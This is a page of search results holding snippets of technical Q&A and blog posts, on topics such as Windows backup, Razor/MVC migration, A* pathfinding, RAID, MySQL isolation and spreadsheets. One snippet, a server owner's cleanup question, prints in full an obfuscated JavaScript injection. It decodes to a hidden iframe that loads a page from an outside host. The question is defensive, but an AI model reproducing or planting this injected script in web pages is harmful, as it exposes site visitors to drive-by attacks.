Search Results

Search found 37101 results on 1485 pages for 'array based'.


  • Why don't file uploads work for a specific customer?

    - by nimo9367
    We have for some time now experienced some unexplainable behavior when a certain customer tries to upload files to our web-based application using a standard web form. It's a CGI-based application and the server is running IIS6. It works fine for all of our other customers using the same server and application, so this must be a client-side issue. The request basically times out and the user gets "page cannot be displayed". Does anyone have any idea what might be the source of this problem?

    Read the article

  • Duplication of Windows 7 Backup

    - by Steven Pickles
    I use the built-in backup utility for Windows 7 because it's automated and flexible enough to let me schedule a daily shadow-copy backup of particular files and folders directly to a separate internal RAID 0 array (2 x 1 TB). It's also lightweight and stays out of the way. For off-site backup purposes, each week I copy the contents of the internal backup from the RAID 0 array to an external 1 TB drive, and then move this drive to a different building. The copy from the internal backup to the external backup typically works like this: mount and erase the contents of the external drive; highlight "file" on the internal drive and hit CTRL+C; CTRL+V on the root directory of the external drive. Is there a better way to synchronize? Microsoft's SyncToy application does a pitiful job and often leaves the folders not truly synchronized, which completely defeats the ability to use the backup's restore feature.
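
    One possibility, as a hedged sketch (drive letters and the folder name are assumptions, not from the original post): mirror the backup folder with robocopy, which ships with Windows 7 and copies only what changed:

        :: Mirror the internal backup folder to the external drive. /MIR makes
        :: the destination an exact mirror (it also deletes files that no longer
        :: exist in the source), so no full erase-and-recopy is needed.
        robocopy D:\WindowsImageBackup E:\WindowsImageBackup /MIR /R:2 /W:5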

    Read the article

  • How to downgrade Razor 3 and fix CSHTML files not working in VS 2010/2012?

    - by Anirudha
    Originally posted on: http://geekswithblogs.net/anirugu/archive/2013/11/04/how-to-downgrade-razor-3-and-fix-the-issue-that.aspx A few days ago I migrated a project to MVC 4 and suddenly noticed that the project's .cshtml files no longer worked. The problem happened because my project was now based on Razor 3 RC, which VS 2012 doesn't support yet (the VS team will ship support in VS 2012 Update 4). My migration updated the project to Razor 3, which is not required by MVC 4 (MVC 4 uses the older Razor 2). So how to fix the problem? Since VS 2012 Update 4 is still in development and MVC 3 support exists in both older versions of VS (2010 and 2012), it is better to migrate Razor back to the old version so the project can be used in VS 2010 or 2012. If your project has Razor 3 and syntax highlighting doesn't seem to work for you, I suggest you try this NuGet package: https://www.nuget.org/packages/UpgradeMvc3ToMvc4. Note that this may not succeed at first. What you need to do is delete the packages folder in your project, then open packages.config and remove all the package entries. Now run this command: PM> Install-Package UpgradeMvc3ToMvc4. If it fails, see what causes the error in the console, simply remove the offending reference, and try again. Now run the project and it should work. Afterwards you may see that the WebGrease DLL has a version-number issue; simply update it to version 1.5.2 and your project is ready to run on .NET 4. If you do bin deployment, you don't even need MVC 4 installed on the server. Remember that MVC 5 is based on .NET 4.5, which simply means you can't run it in VS 2010, and until VS 2012 Update 4, MVC 5 .cshtml pages will behave like plain HTML pages (no syntax highlighting and no IntelliSense). Thanks for reading my post.
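
    For reference, a hedged sketch of the kind of packages.config entries to remove before re-installing (package IDs and versions here are illustrative, not from the original project):

        <?xml version="1.0" encoding="utf-8"?>
        <packages>
          <!-- Illustrative entries only; remove all of them, then re-install. -->
          <package id="Microsoft.AspNet.Mvc" version="4.0.30506.0" targetFramework="net40" />
          <package id="Microsoft.AspNet.Razor" version="3.0.0" targetFramework="net40" />
          <package id="Microsoft.AspNet.WebPages" version="3.0.0" targetFramework="net40" />
        </packages>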

    Read the article

  • Speaking at Sinergija12

    - by DigiMortal
    Next week I will be a speaker at Sinergija12, the biggest Microsoft conference held in Serbia. The first time I visited Sinergija it was clear to me that this is an event I should come back to. Why? Because the technical level of the sessions was very high, and the sessions I attended were actually pretty hardcore. Now, two years later, I will be back, but this time as a speaker.

    My sessions at Sinergija12: here are my three almost-finished sessions.

    ASP.NET MVC 4 Overview. This session focuses on the new features of ASP.NET MVC 4 and gives the audience a good overview of what is coming. Demos cover all the important new features - agent-based output, new application templates, Web API, and Single Page Applications. This session is for everybody who plans to move to ASP.NET MVC 4 or to start building modern web sites.

    Building SharePoint Online applications using Napa Office 365. The next version of Office 365 allows you to build SharePoint applications using a browser-based IDE hosted in the cloud. This session introduces the new tools and shows, through practical examples, how to build online applications for SharePoint 2013.

    Cloud-enabling ASP.NET MVC applications. The cloud era is here, and over the next years more and more web applications will be hosted in cloud environments; some of our current web applications will be moved there too. This session shows the audience how to change the architecture of an ASP.NET web application so it runs on both shared hosting and Windows Azure with the same code base. The audience will also see how to debug and deploy web applications to Windows Azure.

    All developers who are coming to Sinergija12 are welcome to my sessions. See you there! :)

    Read the article

  • Recover deleted files on a Windows 2008 file server

    - by aniga
    We have recently been hit by a weird virus which marked all files and folders as system files/folders and hid them all, apart from some weird ones it created, including: ..exe, porn.exe, secret.exe, password.exe, etc. We have managed to restore the files with the attrib command, unhiding them and unmarking them as system files; however, we have noticed that we are missing some 4 to 5 folders, of which (based on my luck) 2 belong to the two most important clients we have. I am not sure if these files were deleted by the worm/virus or by my colleagues, who are not owning up to it, but the files are now gone. Worst of all, we do not have any backup whatsoever. (Yes, I know we should have had one; it is a lesson learned, and since last night we have created two forms of backup, one to an external device and one in the cloud, but I doubt any of that will help us now.) We have 1 Windows 2008 file server and 4 client computers running Windows 7. I would be grateful if anyone can help us with how we can recover from this disaster, which could potentially put us out of business.

    Read the article

  • What is the value of checking in failing unit tests?

    - by user20194
    While there are ways of keeping unit tests from being executed, what is the value of checking in failing unit tests? I will use a simple example: case sensitivity. The current code is case sensitive. A valid input into the method is "Cat", and it returns the enum value Animal.Cat. However, the desired functionality of the method should not be case sensitive: if the method is passed "cat", it could possibly return something like Animal.Null instead of Animal.Cat, and the unit test would fail. Though a simple code change would fix this example, a more complex issue may take weeks to fix, while identifying the bug with a unit test could be a far less complex task. The application currently being analyzed has 4 years of code that "works". However, recent discussions regarding unit tests have found flaws in the code. Some flaws just need explicit implementation documentation (e.g. case sensitive or not), or sit in code paths that never trigger the bug given how they are currently called. But unit tests can be created that execute specific scenarios, with valid inputs, that will cause the bug to be seen. What is the value of checking in unit tests that exercise the bug until someone can get around to fixing the code? Should such a unit test be flagged with ignore, priority, category, etc., to determine whether a build was successful based on the tests executed? Eventually the unit test would be made to pass once someone fixes the code. On one hand, checking them in shows that identified bugs have not been fixed. On the other, there could be hundreds of failed unit tests showing up in the logs, and weeding out the ones that are expected to fail from failures caused by a new code check-in would be difficult.
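
    A hedged sketch of the flagging idea (the NUnit attributes are real; the fixture, bug number, and AnimalParser helper are hypothetical): check the failing test in, but mark it so the build stays green while the known bug stays visible.

        using NUnit.Framework;

        [TestFixture]
        public class AnimalParserTests
        {
            [Test]
            [Ignore("Known bug #123: lookup is case sensitive")]
            [Category("KnownBugs")]
            public void Parse_IsCaseInsensitive()
            {
                // Fails today: "cat" currently yields Animal.Null.
                Assert.AreEqual(Animal.Cat, AnimalParser.Parse("cat"));
            }
        }

    A CI job can then run the "KnownBugs" category on its own, so expected failures never mix with fresh regressions in the main build log.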

    Read the article

  • What is the correct way to implement Auth/ACL in MVC?

    - by WiseStrawberry
    I am looking into building a correctly laid out MVC Auth/ACL system. I think I want the authentication of a user (and the session handling) to be separate from the ACL system. (I don't know exactly why, but this seems a good idea from the things I've read.) What does MVC have to do with this question, you ask? Because I wish for the application to be well integrated with my ACL. An example of a controller (CodeIgniter):

        <?php
        class Forums extends MX_Controller {

            public $allowed = array('users', 'admin');
            public $need_login = true;

            function __construct() {
                // Example of checking if logged in.
                if ($this->auth->logged_in() && $this->auth->is_admin()) {
                    echo "you're logged in!";
                }
            }

            public function add_topic() {
                if ($this->auth->allowed('add_topic')) {
                    // Some add-topic things.
                } else {
                    echo 'not allowed to add topic';
                }
            }
        }
        ?>

    My thoughts: $this->auth would be autoloaded in the system. I would like to check the $allowed array against the user currently (not) logged in and react accordingly. Is this a good way of doing things? I haven't seen much literature on MVC integration and Auth. I want to make things as easy as possible.
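
    One way to structure the check, as a hedged sketch (all names are hypothetical, not CodeIgniter or MX built-ins): keep an ACL class that maps actions to roles, separate from the Auth class that only knows who is logged in.

        <?php
        class Acl
        {
            // Which roles may perform which actions.
            private $rules = array(
                'add_topic'    => array('users', 'admin'),
                'delete_topic' => array('admin'),
            );

            public function allowed($role, $action)
            {
                return isset($this->rules[$action])
                    && in_array($role, $this->rules[$action], true);
            }
        }

        // Usage, roughly matching the controller above:
        // $acl = new Acl();
        // if ($acl->allowed($current_user_role, 'add_topic')) { /* ... */ }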

    Read the article

  • Web Applications Desktop Integrator (WebADI) Feature for Install Base Mass Update in 12.1.3

    - by LuciaC
    Purpose: the integration of WebADI technology with the Install Base Mass Update function is designed to make creating and updating bulk item instances much easier than in the past.

    What is it? WebADI is an Excel-based desktop application where users can download an Excel template with item instances pre-populated based on search criteria. Users can create and update item instances in the Excel sheet and finally upload the data using an "upload" option available in the Excel menu. On upload, the modified data is bulk-loaded into interface tables, which are processed by an asynchronous concurrent program whose results users can monitor.

    Advantage: this allows users to work in a disconnected environment. Session timeouts can be avoided: once a template is downloaded, the user can work offline, and once all updates are done the new input can be uploaded. The data can also be saved for later update and upload.

    For more details review the following: R12.1.3 Install Base WebADI Mass Update Feature (Doc ID 1535936.1) and How To Use Install Base WebADI Mass Update Feature In Release 12.1.3 (Doc ID 1536498.1).

    Read the article

  • Internal speakers do not work

    - by Nikcefo
    I have a new (from scratch, not an upgrade) installation of Ubuntu 12.10 on my notebook, an Asus A3Ac (based on Intel Centrino - a Pentium M with a full-duplex Intel HDA codec). In older versions of Debian-based systems, Intel HDA audio didn't work correctly: alsamixer displayed wrong outputs and inputs (more than the notebook really has). In clean installations the internal speakers played, but they didn't mute when headphones were plugged in. There was a solution (probably not the best, but working): edit /etc/modprobe.d/alsa-base.conf as root and add the line "options snd-hda-intel model=z71v position_fix=1". After a restart it worked correctly (alsamixer displayed the correct devices and the internal speakers muted when I plugged in headphones). This also worked in Ubuntu 12.04. In Ubuntu 12.10 I have another problem. Alsamixer displays the correct outputs and inputs by default (no need to edit alsa-base.conf), but the internal speakers don't work when headphones are not plugged in. I have to manually disable the "Auto-Mute" option in alsamixer; then the internal speakers work (but of course they don't mute when headphones are plugged in). Thanks for any idea how to fix it. I'm not sure if it is a bug or if it's caused by the specific hardware. Tomas

    Read the article

  • How do I move an Amazon micro instance to a small instance?

    - by Navetz
    I want to move my instance from a micro instance to a small instance, but when I try to launch a new AMI based on my micro instance's AMI, it only gives me the option of 64-bit instances. My initial AMI is based on an Ubuntu 10.04 image. Is it not possible to move between 64-bit and 32-bit instances? Would it be possible to use a load balancer to have a 32-bit instance and a 64-bit instance work together? I have a website/web app that I will be uploading huge volumes of data to. I will be starting with 65 GB of images and then moving up to 100+ GB. I am not sure which instance type would be best for this. I was going to use a load balancer and auto scaling to increase the number of instances when the load is high. Also, when using a load balancer, does one of the AMI instances become the primary image and the rest act as clones of it?

    Read the article

  • Proper way to do texture mapping in modern OpenGL?

    - by RubyKing
    I'm trying to do texture mapping using OpenGL 3.3 and GLSL 150. The problem is that the texture shows but has a weird flicker (I can show a video here). My texture coordinates are in a vertex array. I set the fragment color from the texture and the texel values, and my vertex shader sends the texture coordinates on to the fragment shader. I have my ins and outs set up, and I still don't know what I'm missing that could be causing the flicker. Here is my code.

    Fragment shader:

        #version 150
        uniform sampler2D texture;
        in vec2 texture_coord;
        varying vec3 texture_coordinate;

        void main(void) {
            gl_FragColor = texture(texture, texture_coord);
        }

    Vertex shader:

        #version 150
        in vec4 position;
        out vec2 texture_coordinate;
        out vec2 texture_coord;
        uniform vec3 translations;

        void main() {
            texture_coord = (texture_coordinate);
            gl_Position = vec4(position.xyz + translations.xyz, 1.0);
        }

    Last bit - here is my vertex array with texture coordinates:

        GLfloat vVerts[] = {
            0.5f, 0.5f, 0.0f, 0.0f, 1.0f,   // x, y, z, tex x, tex y
            0.0f, 0.5f, 0.0f, 1.0f, 1.0f,
            0.0f, 0.0f, 0.0f, 0.0f, 0.0f,
            0.5f, 0.0f, 0.0f, 1.0f, 0.0f};

    If you need to see all the code, here is a link to every file. Thank you for your help.
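
    One hedged guess at the cause (a sketch, not a confirmed fix): in the vertex shader above, texture_coordinate is declared as an out and is never written, yet texture_coord is copied from it, so the fragment shader samples undefined coordinates. A corrected pair would declare the texture coordinate as an in attribute fed from the vertex array; the attribute names here are illustrative and must match your glBindAttribLocation / glVertexAttribPointer setup:

        // Vertex shader
        #version 150
        in vec4 position;
        in vec2 texcoord;              // per-vertex attribute from the vertex array
        out vec2 texture_coord;
        uniform vec3 translations;

        void main() {
            texture_coord = texcoord;
            gl_Position = vec4(position.xyz + translations, 1.0);
        }

        // Fragment shader
        #version 150
        uniform sampler2D tex;         // renamed: "texture" collides with the built-in function
        in vec2 texture_coord;
        out vec4 frag_color;           // GLSL 150 style, instead of varying/gl_FragColor

        void main() {
            frag_color = texture(tex, texture_coord);
        }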

    Read the article

  • A* PathFinding Not Consistent

    - by RedShft
    I just started trying to implement a basic A* algorithm in my 2D tile-based game. All of the nodes are tiles on the map, represented by a struct. I believe I understand A* on paper, as I've gone through some pseudocode, but I'm running into problems with the actual implementation. I've double- and triple-checked my node graph, and it is correct, so I believe the issue is with my algorithm. The issue is that with the enemy standing still and the player moving around, the pathfinding function writes "No Path" an astounding number of times and only every so often writes "Path Found", which seems inconsistent. This is the node struct for reference:

        struct Node {
            bool walkable;          // Whether this node is blocked or open
            vect2 position;         // The tile's position on the map in pixels
            int xIndex, yIndex;     // The index values of the tile in the array
            Node*[4] connections;   // Pointers to the nodes this node connects to
            Node* parent;
            int gScore;
            int hScore;
            int fScore;
        }

    Here is the rest: http://pastebin.com/cCHfqKTY. This is my first attempt at A*, so any help would be greatly appreciated.
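
    One hedged guess at the intermittent behaviour (a sketch, not a confirmed diagnosis): per-node search state - parent pointers, scores, open/closed membership - surviving from the previous search can make later searches fail unpredictably. A sketch of resetting it before every run, with field names taken from the Node struct above and reset values assumed:

        #include <limits>

        void resetSearchState(Node* nodes, int count) {
            for (int i = 0; i < count; ++i) {
                nodes[i].parent = nullptr;
                nodes[i].gScore = std::numeric_limits<int>::max();
                nodes[i].hScore = 0;
                nodes[i].fScore = std::numeric_limits<int>::max();
                // If open/closed membership is stored as flags on the node
                // rather than in separate containers, clear those here too.
            }
        }

        // Call resetSearchState(...) at the top of the pathfinding function,
        // before seeding the open list with the start node.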

    Read the article

  • How does Game Salad compare with Cocos2D in terms of 2D game development?

    - by jih
    I want to make some 2D games for iOS. I first came across cocos2d and Kobold, but then wanted something more graphical for rapid prototyping. I then found Game Maker, which doesn't support iOS but is fairly easy to learn, and then found GameSalad, which supports iOS as well as other platforms. I know this question has been asked before, but I want to know, in terms of the types of games I want to develop, which learning investment path would be best. The game genres I am interested in are: side scrollers; simple games like Diamond Dash or Fruit Ninja, Shanghai, etc.; old-fashioned Zelda or Dragon Quest types (Nintendo fan here :-); 2D adventure RPG games (real-time or turn-based); and mystery turn-based games like Carmen Sandiego, Wizardry, Myst, etc. So now the question for me becomes which game development environment I should invest my time in learning: GameSalad or cocos2d? To help make that decision, I was wondering if experienced game programmers could offer some pointers: It would seem GameSalad would be great for quick prototypes, being graphical, but for 2D platform games etc., would there be speed/performance/feature penalties? Are there certain of the 4 genres above that GameSalad is better at, while cocos2d would be better for others?

    Read the article

  • How to kill all screens that have been up longer than 4 weeks?

    - by Darkmage
    I'm creating a script, to be executed every night at 03:00, that will kill all screens that have been running longer than 3 weeks. Has anyone done anything similar that can help? If you have a script or a suggestion for a better method, please help by posting :) I was thinking maybe something like this. First do a dump to a text file: ps -U username -ef | grep SCREEN > dump.txt. Then loop through all lines of dump.txt with a regex, putting the PIDs of the processes whose STIME is 3 weeks ago or older into an array. Then run a kill loop on the array result.
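
    A hedged sketch of a shorter route (assumes a procps ps supporting the etimes output column - elapsed time in seconds - and that detached session masters appear with the command name SCREEN):

        #!/bin/sh
        # Kill every SCREEN process of this user older than 21 days.
        THRESHOLD=$((21 * 24 * 3600))

        ps -U "$USER" -o pid=,etimes=,comm= | while read -r pid secs comm; do
            if [ "$comm" = "SCREEN" ] && [ "$secs" -gt "$THRESHOLD" ]; then
                kill "$pid"
            fi
        done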

    Read the article

  • In developing a SOAP client proxy, which return structure is easier to use and more sensible?

    - by cori
    I'm writing (in PHP) a client/proxy for a SOAP web service. The return types are consistently wrapped in response objects that contain the return values. In many cases this makes a lot of sense - for instance, when multiple values are being returned:

        GetDetailsResponse Object (
            Results Object (
                [TotalResults] => 10
                [NextPage] => 2
            )
            [Details] => Array (
                [0] => Detail Object (
                    [Id] => 1
                )
            )
        )

    But some of the methods return a single scalar value, or a single object or array, wrapped in a response object:

        GetThingummyIdResponse Object (
            [ThingummyId] => 42
        )

    In some cases these objects might be pretty deep, so getting at properties within requires drilling down several layers:

        $response->Details->Detail[0]->Contents->Item[5]->Id

    If I unwrap them before passing them back, I can strip a layer out of consumers' code. I know I'm probably being a little bit of an Architecture Astronaut here, but the latter style really bugs me, so I've been working through my code to have my proxy methods return just the scalar value to the client code where there's no absolute need for a wrapper object. My question is: am I actually making things more difficult for the consumers of my code? Would I be better off leaving the return values wrapped in response objects so that everything is consistent, or is removing unnecessary layers of indirection/abstraction worthwhile?
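
    A hedged sketch of the unwrapping style under discussion (class and method names are hypothetical): the proxy method swallows the wrapper so callers receive a plain scalar.

        <?php
        class ThingummyProxy
        {
            private $soap;

            public function __construct(SoapClient $soap)
            {
                $this->soap = $soap;
            }

            public function getThingummyId()
            {
                // The raw response is GetThingummyIdResponse { ThingummyId: 42 }.
                $response = $this->soap->GetThingummyId();
                return $response->ThingummyId;  // the scalar, not the wrapper
            }
        }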

    Read the article

  • Artists and music - Need Help Deciding on a CMS

    - by infty
    A friend has asked me to build a site with the following options:

    - staff members must be able to add new music and artists to the page
    - a gallery must be provided; ideally each artist can also have his/her own smaller gallery
    - users must be able to vote for artists
    - users must be able to take part in discussions (forums or comment sections)
    - staff members must be able to blog
    - staff members must be able to write articles

    I did a small project where I actually implemented all of these features, but I want to use an existing content management system so that future developers can, hopefully, extend the website more easily - and so that I don't have to provide too much documentation. I have never developed a website using an external CMS like Drupal or WordPress, and after seeing hours of tutorial videos on both systems, I still can't make up my mind on whether I should: a) use Drupal 7, b) use WordPress 3, or c) create my own CMS. I can imagine that staff members would also want to create content using iPhone- or Android-based mobile devices, but this is not a required feature. Can someone with experience please tell me about their experiences with larger projects like this? The site will have approximately 400,000 - 500,000 visitors (not daily visitors; based on numbers from last year over a period of 4 months).

    Read the article

  • What is the best way to store a table in C++

    - by Topo
    I'm programming a decision tree in C++ using a slightly modified version of the C4.5 algorithm. Each node represents an attribute (a column of the data set) and has one child per possible value of the attribute. My problem is how to store the training data set, keeping in mind that I have to use a subset for each node, so I need a quick way to select only a subset of rows and columns. The main goal is to do it in the most memory- and time-efficient way possible (in that order of priority). The best way I have thought of is to have an array of arrays (or std::vector), and for each node keep a list (array, vector, etc.) of the (column, row) pairs that are valid for that node. I know there should be a better way to do this; any suggestions? UPDATE: What I need is something like this. In the beginning I have this data:

        Paris    4  5.0  True
        New York 7  1.3  True
        Tokio    2  9.1  False
        Paris    9  6.8  True
        Tokio    0  8.4  False

    But for the second node I just need this data:

        Paris    4  5.0
        New York 7  1.3
        Paris    9  6.8

    And for the third node:

        Tokio    2  9.1
        Tokio    0  8.4

    But with a table of millions of records and up to hundreds of columns. What I have in mind is to keep all the data in one matrix, and then for each node keep only the info about its current columns and rows:

        Paris    4  5.0  True
        New York 7  1.3  True
        Tokio    2  9.1  False
        Paris    9  6.8  True
        Tokio    0  8.4  False

        Node 2: columns = [0,1,2], rows = [0,1,3]
        Node 3: columns = [0,1,2], rows = [2,4]

    This way, in the worst-case scenario, I just have to waste sizeof(int) * (number_of_columns + number_of_rows) per node, which is a lot less than having an independent data matrix for each node.
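
    The index-based view idea sketches naturally in C++ (a hedged sketch; names are illustrative, not from the original code): the full data set is stored once, and each tree node only keeps the row/column indices still valid for it.

        #include <string>
        #include <vector>

        struct DataSet {
            std::vector<std::vector<std::string>> cells;  // cells[row][col], stored once
        };

        struct NodeView {
            const DataSet* data;
            std::vector<int> rows;   // indices of rows valid at this node
            std::vector<int> cols;   // indices of columns valid at this node

            const std::string& at(int r, int c) const {
                return data->cells[rows[r]][cols[c]];
            }

            // Child view: same columns, only the rows where a predicate holds.
            template <typename Pred>
            NodeView filterRows(Pred keep) const {
                NodeView child{data, {}, cols};
                for (int r : rows)
                    if (keep(data->cells[r])) child.rows.push_back(r);
                return child;
            }
        };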

    Read the article

  • Is it safe to set MySQL isolation to "Read Uncommitted" (dirty reads) for typical Web usage? Even with replication?

    - by Continuation
    I'm working on a website with a typical CRUD web usage pattern, similar to blogs or forums, where users create/update content and other users read it. It seems like it's OK to set the database's isolation level to "Read Uncommitted" (dirty reads) in this case. My understanding of the general drawback of "Read Uncommitted" is that a reader may read uncommitted data that will later be rolled back. In a CRUD blog/forum usage pattern, will there ever be any rollback? And even if there is, is there any major problem with reading uncommitted data? Right now I'm not using any replication, but if in the future I want to use replication (row-based, not statement-based), will a "Read Uncommitted" isolation level prevent me from doing so? What do you think? Has anyone tried using "Read Uncommitted" on their RDBMS?
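
    For concreteness, the switch in question looks like this in MySQL (standard syntax; whether it is wise is exactly what the question asks):

        -- Per session, affecting only the current connection:
        SET SESSION TRANSACTION ISOLATION LEVEL READ UNCOMMITTED;

        -- Or server-wide in my.cnf (applies to new connections):
        -- [mysqld]
        -- transaction-isolation = READ-UNCOMMITTED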

    Read the article

  • Windows 2008 Best Raid Configuration

    - by Brandon Wilson
    I have four 2 TB hard drives and I was thinking about using RAID 10. This would give me 4 TB, correct? My next question is whether it would be easy to add more hard drives to the RAID array. For example, if I bought another hard drive, could I add it to the array without backing up any data? Basically, I want to be able to start off with 4 TB and add more space as needed when the array becomes full. If this isn't possible with RAID 10, is it possible with any RAID configuration? Any suggestions would be appreciated. Thank you.

    Read the article

  • Linux Raid: Can mdadm --grow a raid1 while mounted?

    - by Chris
    I have two 500 GB drives in a RAID 1 setup that I needed to upgrade for more space. I mdadm --fail'ed each drive in turn, used dd to copy each drive to its respective larger drive (2 TB each), removed the smaller drives and replaced them with the larger ones, then reassembled the array and forced a resync. So now I've got a 500 GB RAID 1 sitting on 2 TB drives, and I wish to grow it. The plan is to use mdadm --manage /dev/md0 --grow to grow the array, then boot a rescue CD, assemble the array in that environment, and run resize2fs on it. Can I use mdadm --grow on a mounted, live filesystem? Also, do I need more options to make sure the grow operation stays RAID 1?
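
    A hedged sketch of the usual two-step sequence (assumes the array is /dev/md0 and carries ext3/ext4; verify backups first). --grow changes only the size, not the RAID level, so no extra options should be needed to stay RAID 1:

        # Grow the md device to the full size of its (now larger) members:
        mdadm --grow /dev/md0 --size=max

        # Then grow the filesystem. ext3/ext4 can usually be grown online on a
        # mounted filesystem with a recent kernel; from a rescue environment
        # the offline variant would be:
        e2fsck -f /dev/md0
        resize2fs /dev/md0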

    Read the article

  • How can I remove malware code in multiple files with sed?

    - by user47556
    I have this malware code in many .html and .php files on the server. I need to remove it using a sed -i expression: search all files under the directory /home/, find the infected files, and remove the code by replacing it with whitespace. The injected code looks like this:

        var usikwseoomg = 'PaBUTyjaZYg3cPaBUTyjaZYg69PaBUTyjaZYg66';var nimbchnzujc = 'PaBUTyjaZYg72';var szwtgmqzekr = 'PaBUTyjaZYg61PaBUTyjaZYg6dPaBUTyjaZYg65PaBUTyjaZYg20PaBUTyjaZYg6ePaBUTyjaZYg61PaBUTyjaZYg6dPaBUTyjaZYg65PaBUTyjaZYg3dPaBUTyjaZYg22';var yvofadunjkv = 'PaBUTyjaZYg6dPaBUTyjaZYg67PaBUTyjaZYg79PaBUTyjaZYg65PaBUTyjaZYg64PaBUTyjaZYg61PaBUTyjaZYg67PaBUTyjaZYg70PaBUTyjaZYg7aPaBUTyjaZYg63PaBUTyjaZYg76';var ylydzxyjaci = 'PaBUTyjaZYg22PaBUTyjaZYg20PaBUTyjaZYg77PaBUTyjaZYg69PaBUTyjaZYg64PaBUTyjaZYg74PaBUTyjaZYg68PaBUTyjaZYg3dPaBUTyjaZYg22PaBUTyjaZYg31PaBUTyjaZYg22PaBUTyjaZYg20PaBUTyjaZYg68PaBUTyjaZYg65PaBUTyjaZYg69PaBUTyjaZYg67PaBUTyjaZYg68PaBUTyjaZYg74PaBUTyjaZYg3dPaBUTyjaZYg22PaBUTyjaZYg30PaBUTyjaZYg22';var xwojmnoxfbs = 'PaBUTyjaZYg20PaBUTyjaZYg73PaBUTyjaZYg72PaBUTyjaZYg63PaBUTyjaZYg3dPaBUTyjaZYg22';var mgsybgilcfx = 'PaBUTyjaZYg68PaBUTyjaZYg74PaBUTyjaZYg74PaBUTyjaZYg70PaBUTyjaZYg3aPaBUTyjaZYg2fPaBUTyjaZYg2f';var nixyhgyjouf = 'koska.sytes.net/phl/logs/index.php';var nesrtqwuirb = 'PaBUTyjaZYg22PaBUTyjaZYg20PaBUTyjaZYg6dPaBUTyjaZYg61PaBUTyjaZYg72PaBUTyjaZYg67PaBUTyjaZYg69PaBUTyjaZYg6ePaBUTyjaZYg77PaBUTyjaZYg69PaBUTyjaZYg64PaBUTyjaZYg74PaBUTyjaZYg68PaBUTyjaZYg3dPaBUTyjaZYg22PaBUTyjaZYg31PaBUTyjaZYg22PaBUTyjaZYg20PaBUTyjaZYg6dPaBUTyjaZYg61PaBUTyjaZYg72PaBUTyjaZYg67PaBUTyjaZYg69PaBUTyjaZYg6ePaBUTyjaZYg68PaBUTyjaZYg65PaBUTyjaZYg69PaBUTyjaZYg67PaBUTyjaZYg68PaBUTyjaZYg74PaBUTyjaZYg3dPaBUTyjaZYg22PaBUTyjaZYg30PaBUTyjaZYg22PaBUTyjaZYg20PaBUTyjaZYg74PaBUTyjaZYg69PaBUTyjaZYg74PaBUTyjaZYg6cPaBUTyjaZYg65PaBUTyjaZYg3dPaBUTyjaZYg22';var rqchyojemkn = 'PaBUTyjaZYg6dPaBUTyjaZYg67PaBUTyjaZYg79PaBUTyjaZYg65PaBUTyjaZYg64PaBUTyjaZYg61PaBUTyjaZYg67PaBUTyjaZYg70PaBUTyjaZYg7aPaBUTyjaZYg63PaBUTyjaZYg76';var niupgeebkhf = 'PaBUTyjaZYg22PaBUTyjaZYg20PaBUTyjaZYg73PaBUTyjaZYg63PaBUTyjaZYg72PaBUTyjaZYg6fPaBUTyjaZYg6cPaBUTyjaZYg6cPaBUTyjaZYg69PaBUTyjaZYg6ePaBUTyjaZYg67PaBUTyjaZYg3dPaBUTyjaZYg22PaBUTyjaZYg6ePaBUTyjaZYg6fPaBUTyjaZYg22PaBUTyjaZYg20PaBUTyjaZYg62PaBUTyjaZYg6fPaBUTyjaZYg72PaBUTyjaZYg64PaBUTyjaZYg65PaBUTyjaZYg72PaBUTyjaZYg3dPaBUTyjaZYg22PaBUTyjaZYg30PaBUTyjaZYg22PaBUTyjaZYg20PaBUTyjaZYg66PaBUTyjaZYg72PaBUTyjaZYg61PaBUTyjaZYg6dPaBUTyjaZYg65PaBUTyjaZYg62PaBUTyjaZYg6fPaBUTyjaZYg72PaBUTyjaZYg64PaBUTyjaZYg65PaBUTyjaZYg72PaBUTyjaZYg3dPaBUTyjaZYg22PaBUTyjaZYg30PaBUTyjaZYg22PaBUTyjaZYg3e';var yyzsvtbnudd = 'PaBUTyjaZYg3cPaBUTyjaZYg2fPaBUTyjaZYg69PaBUTyjaZYg66';var tlclvgxfthn = 'PaBUTyjaZYg72PaBUTyjaZYg61';var zxttbudjafh = 'PaBUTyjaZYg6dPaBUTyjaZYg65PaBUTyjaZYg3e';var yydszqnduko = new Array();yydszqnduko[0]=new Array(usikwseoomg+nimbchnzujc+szwtgmqzekr+yvofadunjkv+ylydzxyjaci+xwojmnoxfbs+mgsybgilcfx+nixyhgyjouf+nesrtqwuirb+rqchyojemkn+niupgeebkhf+yyzsvtbnudd+tlclvgxfthn+zxttbudjafh);document['PaBUTyjaZYgwPaBUTyjaZYgrPaBUTyjaZYgiPaBUTyjaZYgtPaBUTyjaZYgePaBUTyjaZYg'.replace(/PaBUTyjaZYg/g,'')](window['PaBUTyjaZYguPaBUTyjaZYgnPaBUTyjaZYgePaBUTyjaZYgsPaBUTyjaZYgcPaBUTyjaZYgaPaBUTyjaZYgpPaBUTyjaZYgePaBUTyjaZYg'.replace(/PaBUTyjaZYg/g,'')](yydszqnduko.toString().replace(/PaBUTyjaZYg/g,'%')));
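
    A hedged sketch of the find/sed combination (it assumes the injected block always starts with "var usikwseoomg", ends with ")));", sits on a single line, and that the marker string "PaBUTyjaZYg" occurs only in infected files - test on a copy of the tree first):

        # Find candidate files, narrow to infected ones, then strip the
        # injected span in place, keeping .bak copies until verified.
        find /home -type f \( -name '*.php' -o -name '*.html' \) -print0 \
          | xargs -0 grep -lZ 'PaBUTyjaZYg' \
          | xargs -0 sed -i.bak 's/var usikwseoomg.*)));//g'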

    Read the article

  • Summing up spreadsheet data when a column contains “#N/A”

    - by Doris
    I am using Google Spreadsheets to work up some historical stock data, and I use a Google function (=GOOGLEFINANCE(…)) to import the historical closing prices for a stock; then I work with that data further. But in the list of data generated by the =GOOGLEFINANCE(…) function, one of the amounts comes up as #N/A. I don't know why, but it happens for various symbols that I have tried. When I use a MAX function on the array, which includes the N/A line, the MAX function returns nothing but N/A, so the N/A throws off any further functions. I thought I'd create a second column to the right of the imported data with an IF function, something like =IF(A1<0, "0", A1), with the expectation that it would return 0 if cell A1 is the N/A, and the cell value if it is not. However, this still returns N/A. I also tried an ISBLANK function, but that resulted in the same N/A. Does anyone have any suggestions for a workaround to eliminate the N/A from an array of numbers that I am trying to work with?
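
    A hedged sketch of one workaround (the range A1:A100 is an assumption; IFERROR and ARRAYFORMULA are standard Google Sheets functions). IF and ISBLANK don't catch #N/A, but IFERROR maps any error to a fallback value before the aggregate runs:

        =MAX(ARRAYFORMULA(IFERROR(A1:A100, 0)))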

    Read the article

  • Using the Coherence ConcurrentMap Interface (Locking API)

    - by jpurdy
